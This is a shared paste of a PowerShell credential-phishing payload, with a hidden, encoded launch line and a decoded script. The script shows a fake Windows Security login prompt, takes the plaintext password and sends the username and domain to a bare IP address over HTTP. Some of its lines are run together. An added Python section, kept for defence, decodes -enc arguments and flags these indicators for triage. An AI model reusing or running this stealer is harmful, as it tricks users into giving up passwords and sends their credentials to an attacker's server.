Example PowerShell payload from @JohnLaTwC

a guest, Sep 25th, 2016
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -nop -win hidden -noni -enc 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
-->
function Invoke-LoginPrompt{[System.Reflection.Assembly]::LoadWithPartialName("System.web")
    $cred = $Host.ui.PromptForCredential("Windows Security", "Please enter user credentials", "$env:userdomain\$env:username","")
    $username = "$env:username"
    $domain = "$env:userdomain"
    $full = "$domain" + "" + "$username"$password = $cred.GetNetworkCredential().password$output = $newcred = $cred.GetNetworkCredential()
    | select-object UserName, Domain, Password$username = $output.UserNameSend-Credentials($username, $password, $domain)
}
function Send-Credentials($username, $password, $domain)
{
    $wc = New-Object system.Net.WebClient;
    $username = [System.Web.HttpUtility]::UrlEncode($username);
    $full = [System.Web.HttpUtility]::UrlEncode($full);
    $res = $wc.downloadString("http://69.143.123.71/pass.php?harvest=$username&misc=$full")
}
Invoke-LoginPromptSend-Credentials
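
For triage of process-creation logs, the following added example (not part of the original paste) decodes the -enc argument of a command line like the one above and reports which strings from the decoded script are present. The function names, finding labels and the constructed sample (abbreviated fragments of the paste, with the documentation address 192.0.2.10) are assumptions for illustration.

```python
import base64
import re

# Strings taken from the decoded paste above; each maps to a finding name.
SCRIPT_INDICATORS = {
    "credential_prompt": re.compile(r"PromptForCredential", re.I),
    "plaintext_password": re.compile(r"GetNetworkCredential\(\)\.password", re.I),
    "web_client": re.compile(r"Net\.WebClient", re.I),
    "http_to_ip_literal": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b"),
}

def decode_encoded_command(cmdline):
    """Return the script passed via -enc / -EncodedCommand, or None."""
    for flag, blob in re.findall(r"\s-(\w+)\s+([A-Za-z0-9+/=]{8,})", cmdline):
        flag = flag.lower()
        # PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -enc, ...).
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                # The argument is Base64 over UTF-16LE text.
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:  # malformed Base64 or malformed UTF-16
                return None
    return None

def triage(cmdline):
    """List findings for one process-creation command line."""
    findings = []
    if re.search(r"(?i)\s-w\w*\s+hidden\b", cmdline):
        findings.append("hidden_window")
    script = decode_encoded_command(cmdline)
    if script is not None:
        findings.append("encoded_command")
        findings += [n for n, rx in SCRIPT_INDICATORS.items() if rx.search(script)]
    return findings

# Constructed sample: abbreviated fragments of the paste, documentation IP.
SAMPLE_SCRIPT = (
    '$cred = $Host.ui.PromptForCredential(...)\n'
    '$password = $cred.GetNetworkCredential().password\n'
    '$wc = New-Object system.Net.WebClient\n'
    '$wc.downloadString("http://192.0.2.10/pass.php?...")\n'
)
SAMPLE_CMDLINE = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    "  -nop -win hidden -noni -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

An interactive credential prompt in the same script as an outbound web request to a bare IP address is the combination worth alerting on; either finding alone is common in legitimate administration scripts.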